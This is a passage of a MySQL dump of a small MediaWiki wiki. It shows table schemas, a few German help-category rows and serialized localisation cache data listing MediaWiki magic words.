UNLOCK TABLES; -- -- Table structure for table `category` -- DROP TABLE IF EXISTS `category`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `category` ( `cat_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `cat_title` varbinary(255) NOT NULL, `cat_pages` int(11) NOT NULL DEFAULT '0', `cat_subcats` int(11) NOT NULL DEFAULT '0', `cat_files` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`cat_id`), UNIQUE KEY `cat_title` (`cat_title`), KEY `cat_pages` (`cat_pages`) ) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `category` -- LOCK TABLES `category` WRITE; /*!40000 ALTER TABLE `category` DISABLE KEYS */; INSERT INTO `category` VALUES (1,'Wikipedia:Neu_bei_Wikipedia',1,0,0),(2,'Wikipedia:Hilfe',1,0,0),(3,'Wikipedia:Ratschläge',1,0,0); /*!40000 ALTER TABLE `category` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `categorylinks` -- DROP TABLE IF EXISTS `categorylinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `categorylinks` ( `cl_from` int(10) unsigned NOT NULL DEFAULT '0', `cl_to` varbinary(255) NOT NULL DEFAULT '', `cl_sortkey` varbinary(230) NOT NULL DEFAULT '', `cl_sortkey_prefix` varbinary(255) NOT NULL DEFAULT '', `cl_timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP, `cl_collation` varbinary(32) NOT NULL DEFAULT '', `cl_type` enum('page','subcat','file') NOT NULL DEFAULT 'page', UNIQUE KEY `cl_from` (`cl_from`,`cl_to`), KEY `cl_sortkey` (`cl_to`,`cl_type`,`cl_sortkey`,`cl_from`), KEY `cl_timestamp` (`cl_to`,`cl_timestamp`), KEY `cl_collation` (`cl_collation`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `categorylinks` -- LOCK TABLES `categorylinks` WRITE; /*!40000 ALTER TABLE `categorylinks` DISABLE KEYS */; INSERT INTO `categorylinks` VALUES (6,'Wikipedia:Hilfe','STARTHILFE\nWUPPERWIKI:STARTHILFE','Starthilfe','2015-04-29 17:49:36','uppercase','page'),(6,'Wikipedia:Neu_bei_Wikipedia','STARTHILFE\nWUPPERWIKI:STARTHILFE','Starthilfe','2015-04-29 17:49:36','uppercase','page'),(6,'Wikipedia:Ratschläge','STARTHILFE\nWUPPERWIKI:STARTHILFE','Starthilfe','2015-04-29 17:49:36','uppercase','page'); /*!40000 ALTER TABLE `categorylinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `change_tag` -- DROP TABLE IF EXISTS `change_tag`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `change_tag` ( `ct_rc_id` int(11) DEFAULT NULL, `ct_log_id` int(11) DEFAULT NULL, `ct_rev_id` int(11) DEFAULT NULL, `ct_tag` varbinary(255) NOT NULL, `ct_params` blob, UNIQUE KEY `change_tag_rc_tag` (`ct_rc_id`,`ct_tag`), UNIQUE KEY `change_tag_log_tag` (`ct_log_id`,`ct_tag`), UNIQUE KEY `change_tag_rev_tag` (`ct_rev_id`,`ct_tag`), KEY `change_tag_tag_id` (`ct_tag`,`ct_rc_id`,`ct_rev_id`,`ct_log_id`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `change_tag` -- LOCK TABLES `change_tag` WRITE; /*!40000 ALTER TABLE `change_tag` DISABLE KEYS */; /*!40000 ALTER TABLE `change_tag` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `externallinks` -- DROP TABLE IF EXISTS `externallinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `externallinks` ( `el_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `el_from` int(10) unsigned NOT NULL DEFAULT '0', `el_to` blob NOT NULL, `el_index` blob NOT NULL, PRIMARY KEY (`el_id`), KEY `el_from` (`el_from`,`el_to`(40)), KEY `el_to` (`el_to`(60),`el_from`), KEY `el_index` (`el_index`(60)) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `externallinks` -- LOCK TABLES `externallinks` WRITE; /*!40000 ALTER TABLE `externallinks` DISABLE KEYS */; /*!40000 ALTER TABLE `externallinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `filearchive` -- DROP TABLE IF EXISTS `filearchive`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `filearchive` ( `fa_id` int(11) NOT NULL AUTO_INCREMENT, `fa_name` varbinary(255) NOT NULL DEFAULT '', `fa_archive_name` varbinary(255) DEFAULT '', `fa_storage_group` varbinary(16) DEFAULT NULL, `fa_storage_key` varbinary(64) DEFAULT '', `fa_deleted_user` int(11) DEFAULT NULL, `fa_deleted_timestamp` binary(14) DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `fa_deleted_reason` blob, `fa_size` int(10) unsigned DEFAULT '0', `fa_width` int(11) DEFAULT '0', `fa_height` int(11) DEFAULT '0', `fa_metadata` mediumblob, `fa_bits` int(11) DEFAULT '0', `fa_media_type` enum('UNKNOWN','BITMAP','DRAWING','AUDIO','VIDEO','MULTIMEDIA','OFFICE','TEXT','EXECUTABLE','ARCHIVE') DEFAULT NULL, `fa_major_mime` enum('unknown','application','audio','image','text','video','message','model','multipart','chemical') DEFAULT NULL, `fa_minor_mime` varbinary(100) DEFAULT 'unknown', `fa_description` tinyblob, `fa_user` int(10) unsigned DEFAULT '0', `fa_user_text` varbinary(255) DEFAULT NULL, `fa_timestamp` binary(14) DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `fa_deleted` tinyint(3) unsigned NOT NULL DEFAULT '0', `fa_sha1` varbinary(32) NOT NULL DEFAULT '', PRIMARY KEY (`fa_id`), KEY `fa_name` (`fa_name`,`fa_timestamp`), KEY `fa_storage_group` (`fa_storage_group`,`fa_storage_key`), KEY `fa_deleted_timestamp` (`fa_deleted_timestamp`), KEY `fa_user_timestamp` (`fa_user_text`,`fa_timestamp`), KEY `fa_sha1` (`fa_sha1`(10)) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `filearchive` -- LOCK TABLES `filearchive` WRITE; /*!40000 ALTER TABLE `filearchive` DISABLE KEYS */; /*!40000 ALTER TABLE `filearchive` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `hitcounter` -- DROP TABLE IF EXISTS `hitcounter`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `hitcounter` ( `hc_id` int(10) unsigned NOT NULL ) ENGINE=MEMORY DEFAULT CHARSET=utf8 MAX_ROWS=25000; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `hitcounter` -- LOCK TABLES `hitcounter` WRITE; /*!40000 ALTER TABLE `hitcounter` DISABLE KEYS */; /*!40000 ALTER TABLE `hitcounter` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `image` -- DROP TABLE IF EXISTS `image`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `image` ( `img_name` varbinary(255) NOT NULL DEFAULT '', `img_size` int(10) unsigned NOT NULL DEFAULT '0', `img_width` int(11) NOT NULL DEFAULT '0', `img_height` int(11) NOT NULL DEFAULT '0', `img_metadata` mediumblob NOT NULL, `img_bits` int(11) NOT NULL DEFAULT '0', `img_media_type` enum('UNKNOWN','BITMAP','DRAWING','AUDIO','VIDEO','MULTIMEDIA','OFFICE','TEXT','EXECUTABLE','ARCHIVE') DEFAULT NULL, `img_major_mime` enum('unknown','application','audio','image','text','video','message','model','multipart','chemical') DEFAULT NULL, `img_minor_mime` varbinary(100) NOT NULL DEFAULT 'unknown', `img_description` tinyblob NOT NULL, `img_user` int(10) unsigned NOT NULL DEFAULT '0', `img_user_text` varbinary(255) NOT NULL, `img_timestamp` varbinary(14) NOT NULL DEFAULT '', `img_sha1` varbinary(32) NOT NULL DEFAULT '', PRIMARY KEY (`img_name`), KEY `img_usertext_timestamp` (`img_user_text`,`img_timestamp`), KEY `img_size` (`img_size`), KEY `img_timestamp` (`img_timestamp`), KEY `img_sha1` (`img_sha1`(10)), KEY `img_media_mime` (`img_media_type`,`img_major_mime`,`img_minor_mime`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `image` -- LOCK TABLES `image` WRITE; /*!40000 ALTER TABLE `image` DISABLE KEYS */; /*!40000 ALTER TABLE `image` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `imagelinks` -- DROP TABLE IF EXISTS `imagelinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `imagelinks` ( `il_from` int(10) unsigned NOT NULL DEFAULT '0', `il_from_namespace` int(11) NOT NULL DEFAULT '0', `il_to` varbinary(255) NOT NULL DEFAULT '', UNIQUE KEY `il_from` (`il_from`,`il_to`), UNIQUE KEY `il_to` (`il_to`,`il_from`), KEY `il_backlinks_namespace` (`il_to`,`il_from_namespace`,`il_from`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `imagelinks` -- LOCK TABLES `imagelinks` WRITE; /*!40000 ALTER TABLE `imagelinks` DISABLE KEYS */; /*!40000 ALTER TABLE `imagelinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `interwiki` -- DROP TABLE IF EXISTS `interwiki`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `interwiki` ( `iw_prefix` varbinary(32) NOT NULL, `iw_url` blob NOT NULL, `iw_api` blob NOT NULL, `iw_wikiid` varbinary(64) NOT NULL, `iw_local` tinyint(1) NOT NULL, `iw_trans` tinyint(4) NOT NULL DEFAULT '0', UNIQUE KEY `iw_prefix` (`iw_prefix`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `interwiki` -- LOCK TABLES `interwiki` WRITE; /*!40000 ALTER TABLE `interwiki` DISABLE KEYS */; /*!40000 ALTER TABLE `interwiki` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `ipblocks` -- DROP TABLE IF EXISTS `ipblocks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `ipblocks` ( `ipb_id` int(11) NOT NULL AUTO_INCREMENT, `ipb_address` tinyblob NOT NULL, `ipb_user` int(10) unsigned NOT NULL DEFAULT '0', `ipb_by` int(10) unsigned NOT NULL DEFAULT '0', `ipb_by_text` varbinary(255) NOT NULL DEFAULT '', `ipb_reason` tinyblob NOT NULL, `ipb_timestamp` binary(14) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0', `ipb_auto` tinyint(1) NOT NULL DEFAULT '0', `ipb_anon_only` tinyint(1) NOT NULL DEFAULT '0', `ipb_create_account` tinyint(1) NOT NULL DEFAULT '1', `ipb_enable_autoblock` tinyint(1) NOT NULL DEFAULT '1', `ipb_expiry` varbinary(14) NOT NULL DEFAULT '', `ipb_range_start` tinyblob NOT NULL, `ipb_range_end` tinyblob NOT NULL, `ipb_deleted` tinyint(1) NOT NULL DEFAULT '0', `ipb_block_email` tinyint(1) NOT NULL DEFAULT '0', `ipb_allow_usertalk` tinyint(1) NOT NULL DEFAULT '0', `ipb_parent_block_id` int(11) DEFAULT NULL, PRIMARY KEY (`ipb_id`), UNIQUE KEY `ipb_address` (`ipb_address`(255),`ipb_user`,`ipb_auto`,`ipb_anon_only`), KEY `ipb_user` (`ipb_user`), KEY `ipb_range` (`ipb_range_start`(8),`ipb_range_end`(8)), KEY `ipb_timestamp` (`ipb_timestamp`), KEY `ipb_expiry` (`ipb_expiry`), KEY `ipb_parent_block_id` (`ipb_parent_block_id`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `ipblocks` -- LOCK TABLES `ipblocks` WRITE; /*!40000 ALTER TABLE `ipblocks` DISABLE KEYS */; /*!40000 ALTER TABLE `ipblocks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `iwlinks` -- DROP TABLE IF EXISTS `iwlinks`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `iwlinks` ( `iwl_from` int(10) unsigned NOT NULL DEFAULT '0', `iwl_prefix` varbinary(20) NOT NULL DEFAULT '', `iwl_title` varbinary(255) NOT NULL DEFAULT '', UNIQUE KEY `iwl_from` (`iwl_from`,`iwl_prefix`,`iwl_title`), KEY `iwl_prefix_title_from` (`iwl_prefix`,`iwl_title`,`iwl_from`), KEY `iwl_prefix_from_title` (`iwl_prefix`,`iwl_from`,`iwl_title`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `iwlinks` -- LOCK TABLES `iwlinks` WRITE; /*!40000 ALTER TABLE `iwlinks` DISABLE KEYS */; /*!40000 ALTER TABLE `iwlinks` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `job` -- DROP TABLE IF EXISTS `job`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `job` ( `job_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `job_cmd` varbinary(60) NOT NULL DEFAULT '', `job_namespace` int(11) NOT NULL, `job_title` varbinary(255) NOT NULL, `job_timestamp` varbinary(14) DEFAULT NULL, `job_params` blob NOT NULL, `job_random` int(10) unsigned NOT NULL DEFAULT '0', `job_attempts` int(10) unsigned NOT NULL DEFAULT '0', `job_token` varbinary(32) NOT NULL DEFAULT '', `job_token_timestamp` varbinary(14) DEFAULT NULL, `job_sha1` varbinary(32) NOT NULL DEFAULT '', PRIMARY KEY (`job_id`), KEY `job_sha1` (`job_sha1`), KEY `job_cmd_token` (`job_cmd`,`job_token`,`job_random`), KEY `job_cmd_token_id` (`job_cmd`,`job_token`,`job_id`), KEY `job_cmd` (`job_cmd`,`job_namespace`,`job_title`,`job_params`(128)), KEY `job_timestamp` (`job_timestamp`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `job` -- LOCK TABLES `job` WRITE; /*!40000 ALTER TABLE `job` DISABLE KEYS */; /*!40000 ALTER TABLE `job` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `l10n_cache` -- DROP TABLE IF EXISTS `l10n_cache`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `l10n_cache` ( `lc_lang` varbinary(32) NOT NULL, `lc_key` varbinary(255) NOT NULL, `lc_value` mediumblob NOT NULL, KEY `lc_lang_key` (`lc_lang`,`lc_key`) ) ENGINE=InnoDB DEFAULT CHARSET=binary; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `l10n_cache` -- LOCK TABLES `l10n_cache` WRITE; /*!40000 ALTER TABLE `l10n_cache` DISABLE KEYS */; INSERT INTO `l10n_cache` VALUES ('en','fallback','b:0;'),('en','namespaceNames','a:17:{i:-2;s:5:\"Media\";i:-1;s:7:\"Special\";i:0;s:0:\"\";i:1;s:4:\"Talk\";i:2;s:4:\"User\";i:3;s:9:\"User_talk\";i:5;s:7:\"$1_talk\";i:6;s:4:\"File\";i:7;s:9:\"File_talk\";i:8;s:9:\"MediaWiki\";i:9;s:14:\"MediaWiki_talk\";i:10;s:8:\"Template\";i:11;s:13:\"Template_talk\";i:12;s:4:\"Help\";i:13;s:9:\"Help_talk\";i:14;s:8:\"Category\";i:15;s:13:\"Category_talk\";}'),('en','bookstoreList','a:3:{s:6:\"AddALL\";s:56:\"http://www.addall.com/New/Partner.cgi?query=$1&type=ISBN\";s:14:\"Barnes & Noble\";s:67:\"http://search.barnesandnoble.com/bookSearch/isbnInquiry.asp?isbn=$1\";s:10:\"Amazon.com\";s:46:\"http://www.amazon.com/gp/search/?field-isbn=$1\";}'),('en','magicWords','a:168:{s:8:\"redirect\";a:2:{i:0;i:0;i:1;s:9:\"#REDIRECT\";}s:5:\"notoc\";a:2:{i:0;i:0;i:1;s:9:\"__NOTOC__\";}s:9:\"nogallery\";a:2:{i:0;i:0;i:1;s:13:\"__NOGALLERY__\";}s:8:\"forcetoc\";a:2:{i:0;i:0;i:1;s:12:\"__FORCETOC__\";}s:3:\"toc\";a:2:{i:0;i:0;i:1;s:7:\"__TOC__\";}s:13:\"noeditsection\";a:2:{i:0;i:0;i:1;s:17:\"__NOEDITSECTION__\";}s:1:\"!\";a:2:{i:0;i:1;i:1;s:1:\"!\";}s:12:\"currentmonth\";a:3:{i:0;i:1;i:1;s:12:\"CURRENTMONTH\";i:2;s:13:\"CURRENTMONTH2\";}s:13:\"currentmonth1\";a:2:{i:0;i:1;i:1;s:13:\"CURRENTMONTH1\";}s:16:\"currentmonthname\";a:2:{i:0;i:1;i:1;s:16:\"CURRENTMONTHNAME\";}s:19:\"currentmonthnamegen\";a:2:{i:0;i:1;i:1;s:19:\"CURRENTMONTHNAMEGEN\";}s:18:\"currentmonthabbrev\";a:2:{i:0;i:1;i:1;s:18:\"CURRENTMONTHABBREV\";}s:10:\"currentday\";a:2:{i:0;i:1;i:1;s:10:\"CURRENTDAY\";}s:11:\"currentday2\";a:2:{i:0;i:1;i:1;s:11:\"CURRENTDAY2\";}s:14:\"currentdayname\";a:2:{i:0;i:1;i:1;s:14:\"CURRENTDAYNAME\";}s:11:\"currentyear\";a:2:{i:0;i:1;i:1;s:11:\"CURRENTYEAR\";}s:11:\"currenttime\";a:2:{i:0;i:1;i:1;s:11:\"CURRENTTIME\";}s:11:\"currenthour\";a:2:{i:0;i:1;i:1;s:11:\"CURRENTHOUR\";}s:10:\"localmonth\";a:3:{i:0;i:1;i:1;s:10:\"LOCALMONTH\";i:2;s:11:\"LOCALMONTH2\";}s:11:\"localmonth1\";a:2:{i:0;i:1;i:1;s:11:\"LOCALMONTH1\";}s:14:\"localmonthname\";a:2:{i:0;i:1;i:1;s:14:\"LOCALMONTHNAME\";}s:17:\"localmonthnamegen\";a:2:{i:0;i:1;i:1;s:17:\"LOCALMONTHNAMEGEN\";}s:16:\"localmonthabbrev\";a:2:{i:0;i:1;i:1;s:16:\"LOCALMONTHABBREV\";}s:8:\"localday\";a:2:{i:0;i:1;i:1;s:8:\"LOCALDAY\";}s:9:\"localday2\";a:2:{i:0;i:1;i:1;s:9:\"LOCALDAY2\";}s:12:\"localdayname\";a:2:{i:0;i:1;i:1;s:12:\"LOCALDAYNAME\";}s:9:\"localyear\";a:2:{i:0;i:1;i:1;s:9:\"LOCALYEAR\";}s:9:\"localtime\";a:2:{i:0;i:1;i:1;s:9:\"LOCALTIME\";}s:9:\"localhour\";a:2:{i:0;i:1;i:1;s:9:\"LOCALHOUR\";}s:13:\"numberofpages\";a:2:{i:0;i:1;i:1;s:13:\"NUMBEROFPAGES\";}s:16:\"numberofarticles\";a:2:{i:0;i:1;i:1;s:16:\"NUMBEROFARTICLES\";}s:13:\"numberoffiles\";a:2:{i:0;i:1;i:1;s:13:\"NUMBEROFFILES\";}s:13:\"numberofusers\";a:2:{i:0;i:1;i:1;s:13:\"NUMBEROFUSERS\";}s:19:\"numberofactiveusers\";a:2:{i:0;i:1;i:1;s:19:\"NUMBEROFACTIVEUSERS\";}s:13:\"numberofedits\";a:2:{i:0;i:1;i:1;s:13:\"NUMBEROFEDITS\";}s:13:\"numberofviews\";a:2:{i:0;i:1;i:1;s:13:\"NUMBEROFVIEWS\";}s:8:\"pagename\";a:2:{i:0;i:1;i:1;s:8:\"PAGENAME\";}s:9:\"pagenamee\";a:2:{i:0;i:1;i:1;s:9:\"PAGENAMEE\";}s:9:\"namespace\";a:2:{i:0;i:1;i:1;s:9:\"NAMESPACE\";}s:10:\"namespacee\";a:2:{i:0;i:1;i:1;s:10:\"NAMESPACEE\";}s:15:\"namespacenumber\";a:2:{i:0;i:1;i:1;s:15:\"NAMESPACENUMBER\";}s:9:\"talkspace\";a:2:{i:0;i:1;i:1;s:9:\"TALKSPACE\";}s:10:\"talkspacee\";a:2:{i:0;i:1;i:1;s:10:\"TALKSPACEE\";}s:12:\"subjectspace\";a:3:{i:0;i:1;i:1;s:12:\"SUBJECTSPACE\";i:2;s:12:\"ARTICLESPACE\";}s:13:\"subjectspacee\";a:3:{i:0;i:1;i:1;s:13:\"SUBJECTSPACEE\";i:2;s:13:\"ARTICLESPACEE\";}s:12:\"fullpagename\";a:2:{i:0;i:1;i:1;s:12:\"FULLPAGENAME\";}s:13:\"fullpagenamee\";a:2:{i:0;i:1;i:1;s:13:\"FULLPAGENAMEE\";}s:11:\"subpagename\";a:2:{i:0;i:1;i:1;s:11:\"SUBPAGENAME\";}s:12:\"subpagenamee\";a:2:{i:0;i:1;i:1;s:12:\"SUBPAGENAMEE\";}s:12:\"rootpagename\";a:2:{i:0;i:1;i:1;s:12:\"ROOTPAGENAME\";}s:13:\"rootpagenamee\";a:2:{i:0;i:1;i:1;s:13:\"ROOTPAGENAMEE\";}s:12:\"basepagename\";a:2:{i:0;i:1;i:1;s:12:\"BASEPAGENAME\";}s:13:\"basepagenamee\";a:2:{i:0;i:1;i:1;s:13:\"BASEPAGENAMEE\";}s:12:\"talkpagename\";a:2:{i:0;i:1;i:1;s:12:\"TALKPAGENAME\";}s:13:\"talkpagenamee\";a:2:{i:0;i:1;i:1;s:13:\"TALKPAGENAMEE\";}s:15:\"subjectpagename\";a:3:{i:0;i:1;i:1;s:15:\"SUBJECTPAGENAME\";i:2;s:15:\"ARTICLEPAGENAME\";}s:16:\"subjectpagenamee\";a:3:{i:0;i:1;i:1;s:16:\"SUBJECTPAGENAMEE\";i:2;s:16:\"ARTICLEPAGENAMEE\";}s:3:\"msg\";a:2:{i:0;i:0;i:1;s:4:\"MSG:\";}s:5:\"subst\";a:2:{i:0;i:0;i:1;s:6:\"SUBST:\";}s:9:\"safesubst\";a:2:{i:0;i:0;i:1;s:10:\"SAFESUBST:\";}s:5:\"msgnw\";a:2:{i:0;i:0;i:1;s:6:\"MSGNW:\";}s:13:\"img_thumbnail\";a:3:{i:0;i:1;i:1;s:9:\"thumbnail\";i:2;s:5:\"thumb\";}s:15:\"img_manualthumb\";a:3:{i:0;i:1;i:1;s:12:\"thumbnail=$1\";i:2;s:8:\"thumb=$1\";}s:9:\"img_right\";a:2:{i:0;i:1;i:1;s:5:\"right\";}s:8:\"img_left\";a:2:{i:0;i:1;i:1;s:4:\"left\";}s:8:\"img_none\";a:2:{i:0;i:1;i:1;s:4:\"none\";}s:9:\"img_width\";a:2:{i:0;i:1;i:1;s:4:\"$1px\";}s:10:\"img_center\";a:3:{i:0;i:1;i:1;s:6:\"center\";i:2;s:6:\"centre\";}s:10:\"img_framed\";a:4:{i:0;i:1;i:1;s:6:\"framed\";i:2;s:8:\"enframed\";i:3;s:5:\"frame\";}s:13:\"img_frameless\";a:2:{i:0;i:1;i:1;s:9:\"frameless\";}s:8:\"img_lang\";a:2:{i:0;i:1;i:1;s:7:\"lang=$1\";}s:8:\"img_page\";a:3:{i:0;i:1;i:1;s:7:\"page=$1\";i:2;s:7:\"page $1\";}s:11:\"img_upright\";a:4:{i:0;i:1;i:1;s:7:\"upright\";i:2;s:10:\"upright=$1\";i:3;s:10:\"upright $1\";}s:10:\"img_border\";a:2:{i:0;i:1;i:1;s:6:\"border\";}s:12:\"img_baseline\";a:2:{i:0;i:1;i:1;s:8:\"baseline\";}s:7:\"img_sub\";a:2:{i:0;i:1;i:1;s:3:\"sub\";}s:9:\"img_super\";a:3:{i:0;i:1;i:1;s:5:\"super\";i:2;s:3:\"sup\";}s:7:\"img_top\";a:2:{i:0;i:1;i:1;s:3:\"top\";}s:12:\"img_text_top\";a:2:{i:0;i:1;i:1;s:8:\"text-top\";}s:10:\"img_middle\";a:2:{i:0;i:1;i:1;s:6:\"middle\";}s:10:\"img_bottom\";a:2:{i:0;i:1;i:1;s:6:\"bottom\";}s:15:\"img_text_bottom\";a:2:{i:0;i:1;i:1;s:11:\"text-bottom\";}s:8:\"img_link\";a:2:{i:0;i:1;i:1;s:7:\"link=$1\";}s:7:\"img_alt\";a:2:{i:0;i:1;i:1;s:6:\"alt=$1\";}s:9:\"img_class\";a:2:{i:0;i:1;i:1;s:8:\"class=$1\";}s:3:\"int\";a:2:{i:0;i:0;i:1;s:4:\"INT:\";}s:8:\"sitename\";a:2:{i:0;i:1;i:1;s:8:\"SITENAME\";}s:2:\"ns\";a:2:{i:0;i:0;i:1;s:3:\"NS:\";}s:3:\"nse\";a:2:{i:0;i:0;i:1;s:4:\"NSE:\";}s:8:\"localurl\";a:2:{i:0;i:0;i:1;s:9:\"LOCALURL:\";}s:9:\"localurle\";a:2:{i:0;i:0;i:1;s:10:\"LOCALURLE:\";}s:11:\"articlepath\";a:2:{i:0;i:0;i:1;s:11:\"ARTICLEPATH\";}s:6:\"pageid\";a:2:{i:0;i:0;i:1;s:6:\"PAGEID\";}s:6:\"server\";a:2:{i:0;i:0;i:1;s:6:\"SERVER\";}s:10:\"servername\";a:2:{i:0;i:0;i:1;s:10:\"SERVERNAME\";}s:10:\"scriptpath\";a:2:{i:0;i:0;i:1;s:10:\"SCRIPTPATH\";}s:9:\"stylepath\";a:2:{i:0;i:0;i:1;s:9:\"STYLEPATH\";}s:7:\"grammar\";a:2:{i:0;i:0;i:1;s:8:\"GRAMMAR:\";}s:6:\"gender\";a:2:{i:0;i:0;i:1;s:7:\"GENDER:\";}s:14:\"notitleconvert\";a:3:{i:0;i:0;i:1;s:18:\"__NOTITLECONVERT__\";i:2;s:8:\"__NOTC__\";}s:16:\"nocontentconvert\";a:3:{i:0;i:0;i:1;s:20:\"__NOCONTENTCONVERT__\";i:2;s:8:\"__NOCC__\";}s:11:\"currentweek\";a:2:{i:0;i:1;i:1;s:11:\"CURRENTWEEK\";}s:10:\"currentdow\";a:2:{i:0;i:1;i:1;s:10:\"CURRENTDOW\";}s:9:\"localweek\";a:2:{i:0;i:1;i:1;s:9:\"LOCALWEEK\";}s:8:\"localdow\";a:2:{i:0;i:1;i:1;s:8:\"LOCALDOW\";}s:10:\"revisionid\";a:2:{i:0;i:1;i:1;s:10:\"REVISIONID\";}s:11:\"revisionday\";a:2:{i:0;i:1;i:1;s:11:\"REVISIONDAY\";}s:12:\"revisionday2\";a:2:{i:0;i:1;i:1;s:12:\"REVISIONDAY2\";}s:13:\"revisionmonth\";a:2:{i:0;i:1;i:1;s:13:\"REVISIONMONTH\";}s:14:\"revisionmonth1\";a:2:{i:0;i:1;i:1;s:14:\"REVISIONMONTH1\";}s:12:\"revisionyear\";a:2:{i:0;i:1;i:1;s:12:\"REVISIONYEAR\";}s:17:\"revisiontimestamp\";a:2:{i:0;i:1;i:1;s:17:\"REVISIONTIMESTAMP\";}s:12:\"revisionuser\";a:2:{i:0;i:1;i:1;s:12:\"REVISIONUSER\";}s:12:\"revisionsize\";a:2:{i:0;i:1;i:1;s:12:\"REVISIONSIZE\";}s:6:\"plural\";a:2:{i:0;i:0;i:1;s:7:\"PLURAL:\";}s:7:\"fullurl\";a:2:{i:0;i:0;i:1;s:8:\"FULLURL:\";}s:8:\"fullurle\";a:2:{i:0;i:0;i:1;s:9:\"FULLURLE:\";}s:12:\"canonicalurl\";a:2:{i:0;i:0;i:1;s:13:\"CANONICALURL:\";}s:13:\"canonicalurle\";a:2:{i:0;i:0;i:1;s:14:\"CANONICALURLE:\";}s:7:\"lcfirst\";a:2:{i:0;i:0;i:1;s:8:\"LCFIRST:\";}s:7:\"ucfirst\";a:2:{i:0;i:0;i:1;s:8:\"UCFIRST:\";}s:2:\"lc\";a:2:{i:0;i:0;i:1;s:3:\"LC:\";}s:2:\"uc\";a:2:{i:0;i:0;i:1;s:3:\"UC:\";}s:3:\"raw\";a:2:{i:0;i:0;i:1;s:4:\"RAW:\";}s:12:\"displaytitle\";a:2:{i:0;i:1;i:1;s:12:\"DISPLAYTITLE\";}s:9:\"rawsuffix\";a:2:{i:0;i:1;i:1;s:1:\"R\";}s:15:\"nocommafysuffix\";a:2:{i:0;i:0;i:1;s:5:\"NOSEP\";}s:14:\"newsectionlink\";a:2:{i:0;i:1;i:1;s:18:\"__NEWSECTIONLINK__\";}s:16:\"nonewsectionlink\";a:2:{i:0;i:1;i:1;s:20:\"__NONEWSECTIONLINK__\";}s:14:\"currentversion\";a:2:{i:0;i:1;i:1;s:14:\"CURRENTVERSION\";}s:9:\"urlencode\";a:2:{i:0;i:0;i:1;s:10:\"URLENCODE:\";}s:12:\"anchorencode\";a:2:{i:0;i:0;i:1;s:12:\"ANCHORENCODE\";}s:16:\"currenttimestamp\";a:2:{i:0;i:1;i:1;s:16:\"CURRENTTIMESTAMP\";}s:14:\"localtimestamp\";a:2:{i:0;i:1;i:1;s:14:\"LOCALTIMESTAMP\";}s:13:\"directionmark\";a:3:{i:0;i:1;i:1